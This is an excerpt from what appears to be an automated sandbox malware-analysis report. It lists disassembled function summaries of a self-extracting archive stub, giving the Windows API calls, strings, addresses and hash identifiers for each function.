                                                                                                                                                                      • Associated: 00000008.00000002.2088403938.0000000000436000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_8_2_400000_3BD2.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: FileTime
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 1425588814-0
                                                                                                                                                                      • Opcode ID: cf5092b52a5e7595e08d5d1fb142c750b52c52c39f02d9e50e4cf558d920441e
                                                                                                                                                                      • Instruction ID: 841114148778ffde61d7a37b9bc87149ccf8c7a1a7a74647ee76dbef892859db
                                                                                                                                                                      • Opcode Fuzzy Hash: cf5092b52a5e7595e08d5d1fb142c750b52c52c39f02d9e50e4cf558d920441e
                                                                                                                                                                      • Instruction Fuzzy Hash: F0C00236200209FB9F125FA1DC06D9A7F6EAB15660B558029FA1844431DA339570AB55
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000008.00000002.2088344302.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000008.00000002.2088328127.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000008.00000002.2088367661.0000000000426000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000008.00000002.2088386751.0000000000430000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000008.00000002.2088403938.0000000000436000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_8_2_400000_3BD2.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ErrorLast
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 1452528299-0
                                                                                                                                                                      • Opcode ID: 5e02415750c6586a4b8473913151e53133f023520e0c3576aa81939558ae493d
                                                                                                                                                                      • Instruction ID: c2e6bed8c44f7ee923090dbc51e80e7d159b00d0d5ad45e76b16a1ec8880bf92
                                                                                                                                                                      • Opcode Fuzzy Hash: 5e02415750c6586a4b8473913151e53133f023520e0c3576aa81939558ae493d
                                                                                                                                                                      • Instruction Fuzzy Hash: 2A01AD3120011AEBCB15DF14C900AEAB775BF85354B10422AAC069B720D7B9ECE2DBE8
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      APIs
                                                                                                                                                                      • VirtualAlloc.KERNELBASE(00000000,00000000,00001000,00000004,?,0040F342,?), ref: 0040F36C
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000008.00000002.2088344302.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000008.00000002.2088328127.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000008.00000002.2088367661.0000000000426000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000008.00000002.2088386751.0000000000430000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000008.00000002.2088403938.0000000000436000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_8_2_400000_3BD2.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: AllocVirtual
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 4275171209-0
                                                                                                                                                                      • Opcode ID: cb5345b38f13f542bc0999f45fbaa860d8fabc4394678cc27047b20c3bcd7128
                                                                                                                                                                      • Instruction ID: 25a03838a9e5bde41bd996443d3f41719a01a07f7eb970dafa34d09213db41b0
                                                                                                                                                                      • Opcode Fuzzy Hash: cb5345b38f13f542bc0999f45fbaa860d8fabc4394678cc27047b20c3bcd7128
                                                                                                                                                                      • Instruction Fuzzy Hash: D0C0803128430CFBEF200AD0EC07BE537589704B66F40C031F70C584D1C3F154A04548
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      APIs
                                                                                                                                                                      • VirtualFree.KERNELBASE(00000000,00000000,00008000,?,0040F350,?), ref: 0040F387
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000008.00000002.2088344302.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000008.00000002.2088328127.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000008.00000002.2088367661.0000000000426000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000008.00000002.2088386751.0000000000430000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000008.00000002.2088403938.0000000000436000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_8_2_400000_3BD2.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: FreeVirtual
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 1263568516-0
                                                                                                                                                                      • Opcode ID: f9f868b486ca6c55b60dd3b02b900ebd25f17458d15dbc2f3974d298502b1edd
                                                                                                                                                                      • Instruction ID: d189a471d701b531934ebdd57e225923eb8a4c3344d10efef1124ca1f94c8f55
                                                                                                                                                                      • Opcode Fuzzy Hash: f9f868b486ca6c55b60dd3b02b900ebd25f17458d15dbc2f3974d298502b1edd
                                                                                                                                                                      • Instruction Fuzzy Hash: 3AC04C30140B08A6DB211E54DC09BA53A68B704755F948071BA0C285E1C7B565A6CA88
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      APIs
                                                                                                                                                                      • GetLastError.KERNEL32 ref: 00404227
                                                                                                                                                                      • wsprintfW.USER32 ref: 00404238
                                                                                                                                                                      • GetEnvironmentVariableW.KERNEL32(?,00000000,00000000), ref: 00404247
                                                                                                                                                                      • GetLastError.KERNEL32 ref: 00404252
                                                                                                                                                                      • GetEnvironmentVariableW.KERNEL32(?,00000000,0000002D), ref: 0040427C
                                                                                                                                                                      • GetLastError.KERNEL32 ref: 00404287
                                                                                                                                                                      • lstrcmpiW.KERNEL32(00000000,00000000), ref: 00404299
                                                                                                                                                                      • SetLastError.KERNEL32(00401877), ref: 004042CD
                                                                                                                                                                      • lstrlenA.KERNEL32(00426DC8), ref: 00404303
                                                                                                                                                                      • GetLocaleInfoW.KERNEL32(?,00001004,?,0000001F), ref: 00404352
                                                                                                                                                                      • MultiByteToWideChar.KERNEL32(000004E4,00000000,00426DC8,00000001,00000000,00000002), ref: 00404388
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000008.00000002.2088344302.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000008.00000002.2088328127.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000008.00000002.2088367661.0000000000426000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000008.00000002.2088386751.0000000000430000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000008.00000002.2088403938.0000000000436000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_8_2_400000_3BD2.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ErrorLast$EnvironmentVariable$ByteCharInfoLocaleMultiWidelstrcmpilstrlenwsprintf
                                                                                                                                                                      • String ID: SfxString%d
                                                                                                                                                                      • API String ID: 1827968993-944934635
                                                                                                                                                                      • Opcode ID: 7f4e098597d81223bb14df3bea17dc4cac01222421f863eb01eaa9ddeedfdf3f
                                                                                                                                                                      • Instruction ID: b47b955149cd9fcfcc159436c999e3e9f69cbd094d4f4f1dc6c80038ee8dbebb
                                                                                                                                                                      • Opcode Fuzzy Hash: 7f4e098597d81223bb14df3bea17dc4cac01222421f863eb01eaa9ddeedfdf3f
                                                                                                                                                                      • Instruction Fuzzy Hash: E94190B1701205EBDB24DB65EC59F6B77B8EB84750B10467EF60AEB290D734A841CB28
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      APIs
                                                                                                                                                                      • GetModuleHandleW.KERNEL32(00000000), ref: 00404C25
                                                                                                                                                                      • FindResourceExA.KERNEL32(00000000,?,?), ref: 00404C42
                                                                                                                                                                      • FindResourceExA.KERNEL32(00000000,?,?,00000409), ref: 00404C56
                                                                                                                                                                      • SizeofResource.KERNEL32(00000000,00000000), ref: 00404C67
                                                                                                                                                                      • LoadResource.KERNEL32(00000000,00000000), ref: 00404C71
                                                                                                                                                                      • LockResource.KERNEL32(00000000), ref: 00404C7C
                                                                                                                                                                      • GetProcAddress.KERNEL32(SetProcessPreferredUILanguages), ref: 00404CA8
                                                                                                                                                                      • wsprintfW.USER32 ref: 00404CC6
                                                                                                                                                                      • GetProcAddress.KERNEL32(SetThreadPreferredUILanguages), ref: 00404CDE
                                                                                                                                                                      Strings
                                                                                                                                                                      • SetProcessPreferredUILanguages, xrefs: 00404C93
                                                                                                                                                                      • SetThreadPreferredUILanguages, xrefs: 00404CD3
                                                                                                                                                                      • %04X%c%04X%c, xrefs: 00404CC0
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000008.00000002.2088344302.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000008.00000002.2088328127.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000008.00000002.2088367661.0000000000426000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000008.00000002.2088386751.0000000000430000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000008.00000002.2088403938.0000000000436000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_8_2_400000_3BD2.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Resource$AddressFindProc$HandleLoadLockModuleSizeofwsprintf
                                                                                                                                                                      • String ID: %04X%c%04X%c$SetProcessPreferredUILanguages$SetThreadPreferredUILanguages
                                                                                                                                                                      • API String ID: 2090077119-3413765421
                                                                                                                                                                      • Opcode ID: 7f2cb8d7de5048bc051c4e283d3081dc8163bd7a7b193df09902caeeb95a0e3f
                                                                                                                                                                      • Instruction ID: b1946e7ce9d7ca41136cde43adb60b4889b8b5e940f3081457677548b8fee1e5
                                                                                                                                                                      • Opcode Fuzzy Hash: 7f2cb8d7de5048bc051c4e283d3081dc8163bd7a7b193df09902caeeb95a0e3f
                                                                                                                                                                      • Instruction Fuzzy Hash: ED2104B2705224BFEB215B619D85F6B36ACEB44B60F06013AFF04A2290D7B48C0196AC
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      APIs
                                                                                                                                                                      • wvsprintfW.USER32(?,00000000,?), ref: 00409C0A
                                                                                                                                                                      • GetLastError.KERNEL32(?,0000FDE9,00000000), ref: 00409C1A
                                                                                                                                                                      • FormatMessageW.KERNEL32(00001100,00000000,00000000,?,00000000,00000000,00000000,?,0000FDE9,00000000), ref: 00409C42
                                                                                                                                                                      • FormatMessageW.KERNEL32(00001100,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,00000000,?,0000FDE9,00000000), ref: 00409C59
                                                                                                                                                                      • lstrlenW.KERNEL32(?,?,00000000,00000000,00000000,?,0000FDE9,00000000), ref: 00409C6C
                                                                                                                                                                      • lstrlenW.KERNEL32(00000000,?,00000000,00000000,00000000,?,0000FDE9,00000000), ref: 00409C73
                                                                                                                                                                      • lstrcpyW.KERNEL32(00000000,?), ref: 00409C9F
                                                                                                                                                                      • lstrcpyW.KERNEL32(00000002,00000000), ref: 00409CB2
                                                                                                                                                                      • LocalFree.KERNEL32(00000000,?,00000000,00000000,00000000,?,0000FDE9,00000000), ref: 00409CC5
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000008.00000002.2088344302.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000008.00000002.2088328127.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000008.00000002.2088367661.0000000000426000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000008.00000002.2088386751.0000000000430000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000008.00000002.2088403938.0000000000436000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_8_2_400000_3BD2.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: FormatMessagelstrcpylstrlen$ErrorFreeLastLocalwvsprintf
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 4146474141-0
                                                                                                                                                                      • Opcode ID: abf9a4ac6d111573c16582b3a4eebcefae3121f7bf6054cbea188eb8f30ba9a7
                                                                                                                                                                      • Instruction ID: 508669374a93101f4eed159fa3ad7ff8dc3d414b8dd120f761924a60aac3ce36
                                                                                                                                                                      • Opcode Fuzzy Hash: abf9a4ac6d111573c16582b3a4eebcefae3121f7bf6054cbea188eb8f30ba9a7
                                                                                                                                                                      • Instruction Fuzzy Hash: 382195B2500108BFEB15ABA0DC89DEB7BACEB44394F10407BF505D7191EB749D458BA4
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      APIs
                                                                                                                                                                      • GetCurrentThreadId.KERNEL32 ref: 0040908D
                                                                                                                                                                      • SetWindowsHookExW.USER32(00000007,Function_0000A042,00000000,00000000), ref: 0040909D
                                                                                                                                                                      • GetCurrentThreadId.KERNEL32 ref: 004090B1
                                                                                                                                                                      • SetWindowsHookExW.USER32(00000002,Function_0000A013,00000000,00000000), ref: 004090C1
                                                                                                                                                                      • EndDialog.USER32(?,00000000), ref: 004090EC
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000008.00000002.2088344302.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000008.00000002.2088328127.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000008.00000002.2088367661.0000000000426000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000008.00000002.2088386751.0000000000430000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000008.00000002.2088403938.0000000000436000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_8_2_400000_3BD2.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: CurrentHookThreadWindows$Dialog
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 1967849563-0
                                                                                                                                                                      • Opcode ID: 4df84d1bd656f8eaedc51198c563da29db259af31261c873a9cfec0d0174961a
                                                                                                                                                                      • Instruction ID: 1de629513dfd5212a045c9051dfbcd0eeee4196d663c53dd5cbd2f8a4d13d288
                                                                                                                                                                      • Opcode Fuzzy Hash: 4df84d1bd656f8eaedc51198c563da29db259af31261c873a9cfec0d0174961a
                                                                                                                                                                      • Instruction Fuzzy Hash: E6F03770640320DFE730AF25EC1DB6A36A4B708712F41553AEA06A15E2C7F91C85DB59
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      APIs
                                                                                                                                                                      • SHGetSpecialFolderPathW.SHELL32(00000000,?,00000019,00000000), ref: 00403997
                                                                                                                                                                      • CoCreateInstance.OLE32(00428EFC,00000000,00000001,00428EBC,?,.lnk,?), ref: 00403AFA
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000008.00000002.2088344302.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000008.00000002.2088328127.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000008.00000002.2088367661.0000000000426000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000008.00000002.2088386751.0000000000430000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000008.00000002.2088403938.0000000000436000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_8_2_400000_3BD2.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: CreateFolderInstancePathSpecial
                                                                                                                                                                      • String ID: .lnk
                                                                                                                                                                      • API String ID: 3960669845-24824748
                                                                                                                                                                      • Opcode ID: 466caa6d68620f439d6c09d30aa0ec6d90ae214fa68045dc1d0a9ae9f45ddbea
                                                                                                                                                                      • Instruction ID: 0f9c674c318c4d2dd5ba718d070338e33a1de2cf573e2aabd0fee71f76e26f14
                                                                                                                                                                      • Opcode Fuzzy Hash: 466caa6d68620f439d6c09d30aa0ec6d90ae214fa68045dc1d0a9ae9f45ddbea
                                                                                                                                                                      • Instruction Fuzzy Hash: 3D919E71900108AEDB04EFA5DC55DEEBBB9EF44305F50402EF501B61E2EB79AE86CB58
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      APIs
                                                                                                                                                                      • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 0040496E
                                                                                                                                                                      • CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 00404980
                                                                                                                                                                      • FreeSid.ADVAPI32(?), ref: 00404989
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000008.00000002.2088344302.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000008.00000002.2088328127.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000008.00000002.2088367661.0000000000426000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000008.00000002.2088386751.0000000000430000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000008.00000002.2088403938.0000000000436000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_8_2_400000_3BD2.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: AllocateCheckFreeInitializeMembershipToken
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 3429775523-0
                                                                                                                                                                      • Opcode ID: f341d5858635c32a3842cc5ccc92d0fbf7a255c5229dfdb0991bff57df6e8d4b
                                                                                                                                                                      • Instruction ID: d36a6a43374de4970cfb710a451365c27491d80713a9525f54b4ff8bd746f58d
                                                                                                                                                                      • Opcode Fuzzy Hash: f341d5858635c32a3842cc5ccc92d0fbf7a255c5229dfdb0991bff57df6e8d4b
                                                                                                                                                                      • Instruction Fuzzy Hash: 40F07AB5A0020CFFEB10DFD5DD89EAEBBBCFB08744F5054A5A601A2191D7709E059B58
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000008.00000002.2088344302.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000008.00000002.2088328127.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000008.00000002.2088367661.0000000000426000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000008.00000002.2088386751.0000000000430000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000008.00000002.2088403938.0000000000436000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_8_2_400000_3BD2.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID: .
                                                                                                                                                                      • API String ID: 0-248832578
                                                                                                                                                                      • Opcode ID: e89b55ebbe91406ee1432f6ff6a450b024342772fbaac3b4abb21e80c8ce0c6b
                                                                                                                                                                      • Instruction ID: 4d9d9654dab04340915243de6610c861b2a3d70b831f000788b3d0948a8fbb8b
                                                                                                                                                                      • Opcode Fuzzy Hash: e89b55ebbe91406ee1432f6ff6a450b024342772fbaac3b4abb21e80c8ce0c6b
                                                                                                                                                                      • Instruction Fuzzy Hash: C7310575900209AFDB24CE6ACC85EFB7BAEDB45348F14019EF84997351E6349D81CB94
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000008.00000002.2088344302.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000008.00000002.2088328127.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000008.00000002.2088367661.0000000000426000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000008.00000002.2088386751.0000000000430000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000008.00000002.2088403938.0000000000436000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_8_2_400000_3BD2.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: HeapProcess
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 54951025-0
                                                                                                                                                                      • Opcode ID: ede0a47e02430bebc9072c59c6c572927439b9f1fb140f525b851199ab4272d6
                                                                                                                                                                      • Instruction ID: 191087c2d9ee7c1145000199b197fd8ac47fc9fe05b61f43655889c43006938d
                                                                                                                                                                      • Opcode Fuzzy Hash: ede0a47e02430bebc9072c59c6c572927439b9f1fb140f525b851199ab4272d6
                                                                                                                                                                      • Instruction Fuzzy Hash: 7BA011302002028F83808F30AA0820A3AA8AA002E238A2038A000C2020EB3880A0AA08
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      APIs
                                                                                                                                                                      • GetCommandLineW.KERNEL32(?,?), ref: 00402328
                                                                                                                                                                      • GetStartupInfoW.KERNEL32(00000044,?,?,?,?,?,?,?,?,?,00000000), ref: 00402464
                                                                                                                                                                      • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000001,01000004,00000000,00000044,?), ref: 0040248B
                                                                                                                                                                      • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,00000000), ref: 00402495
                                                                                                                                                                      • CreateJobObjectW.KERNEL32(00000000,00000000), ref: 004024A6
                                                                                                                                                                      • AssignProcessToJobObject.KERNEL32(00000000,?), ref: 004024BC
                                                                                                                                                                      • CreateIoCompletionPort.KERNEL32(000000FF,00000000,00000001,00000000,?,?,?,?,?,?,?,?,?,00000000), ref: 004024CC
                                                                                                                                                                      • SetInformationJobObject.KERNEL32(00000000,00000007,00000000,00000008), ref: 004024EB
                                                                                                                                                                      • ResumeThread.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000), ref: 004024F4
                                                                                                                                                                      • GetQueuedCompletionStatus.KERNEL32(00000000,00000000,00000000,?,000000FF,?,?,?,?,?,?,?,?,?,00000000), ref: 0040250D
                                                                                                                                                                      • ResumeThread.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040251A
                                                                                                                                                                      • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,?,?,?,?,?,?,00000000), ref: 00402521
                                                                                                                                                                      • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000), ref: 00402530
                                                                                                                                                                      • GetExitCodeProcess.KERNEL32(?,00000000), ref: 00402539
                                                                                                                                                                      • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,00000000), ref: 00402543
                                                                                                                                                                      • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040254F
                                                                                                                                                                      • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,00000000), ref: 00402556
                                                                                                                                                                      • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,00000000), ref: 0040255D
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000008.00000002.2088344302.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000008.00000002.2088328127.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000008.00000002.2088367661.0000000000426000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000008.00000002.2088386751.0000000000430000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000008.00000002.2088403938.0000000000436000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_8_2_400000_3BD2.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: CloseHandleObject$CreateProcess$CompletionErrorLastResumeThread$AssignCodeCommandExitInfoInformationLinePortQueuedSingleStartupStatusWait
                                                                                                                                                                      • String ID: " -$D$sfxwaitall
                                                                                                                                                                      • API String ID: 47019888-3949692445
                                                                                                                                                                      • Opcode ID: db907838a9ef951b82fdb0fae0d522fa3cf8f07bdfab089a8253480225f1884e
                                                                                                                                                                      • Instruction ID: 1d43b18fbf7b1c6edcb2810850b1789e679404b1dcd4d52ef286dc22b27973a9
                                                                                                                                                                      • Opcode Fuzzy Hash: db907838a9ef951b82fdb0fae0d522fa3cf8f07bdfab089a8253480225f1884e
                                                                                                                                                                      • Instruction Fuzzy Hash: 87616F72900119EBDF21EBA1EC45EDEBB7CAF04344F100176F605B21A1DB395E45DBA8
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      APIs
                                                                                                                                                                      • GetModuleHandleW.KERNEL32(00000000,00000065), ref: 00408881
                                                                                                                                                                      • LoadIconW.USER32(00000000), ref: 00408888
                                                                                                                                                                      • GetSystemMetrics.USER32(00000032), ref: 0040889A
                                                                                                                                                                      • GetSystemMetrics.USER32(00000031), ref: 0040889F
                                                                                                                                                                      • GetModuleHandleW.KERNEL32(00000000,00000065,00000001,00000000), ref: 004088A8
                                                                                                                                                                      • LoadImageW.USER32(00000000), ref: 004088AF
                                                                                                                                                                      • SendMessageW.USER32(?,00000080,00000001,00000000), ref: 004088CD
                                                                                                                                                                      • SendMessageW.USER32(?,00000080,00000000,00000000), ref: 004088DA
                                                                                                                                                                        • Part of subcall function 00409600: GetDlgItem.USER32(?,?), ref: 0040960C
                                                                                                                                                                        • Part of subcall function 00409600: GetWindowTextLengthW.USER32(00000000), ref: 00409613
                                                                                                                                                                        • Part of subcall function 00409600: GetDlgItem.USER32(?,?), ref: 00409626
                                                                                                                                                                        • Part of subcall function 00409DFA: GetDlgItem.USER32(?,?), ref: 00409E09
                                                                                                                                                                        • Part of subcall function 00409DFA: ShowWindow.USER32(00000000,?,?,00408B2D,000004B1,00000000,?,?,?,?,000004B4,00000000,000004B3,00000000,?,00000000), ref: 00409E21
                                                                                                                                                                        • Part of subcall function 004097CD: GetDlgItem.USER32(?,000004B3), ref: 004097E3
                                                                                                                                                                        • Part of subcall function 004097CD: SendMessageW.USER32(00000000,000000F4,00000000,00000001), ref: 004097F5
                                                                                                                                                                        • Part of subcall function 004097CD: GetDlgItem.USER32(?,000004B4), ref: 004097FF
                                                                                                                                                                        • Part of subcall function 004097CD: SendMessageW.USER32(00000000,000000F4,00000000,00000001), ref: 0040980B
                                                                                                                                                                        • Part of subcall function 004097CD: SendMessageW.USER32(?,00000401,?,00000000), ref: 0040981A
                                                                                                                                                                        • Part of subcall function 004097CD: GetDlgItem.USER32(?,?), ref: 00409822
                                                                                                                                                                        • Part of subcall function 004097CD: SendMessageW.USER32(00000000,000000F4,00000001,00000001), ref: 0040982E
                                                                                                                                                                        • Part of subcall function 004097CD: GetDlgItem.USER32(?,?), ref: 00409836
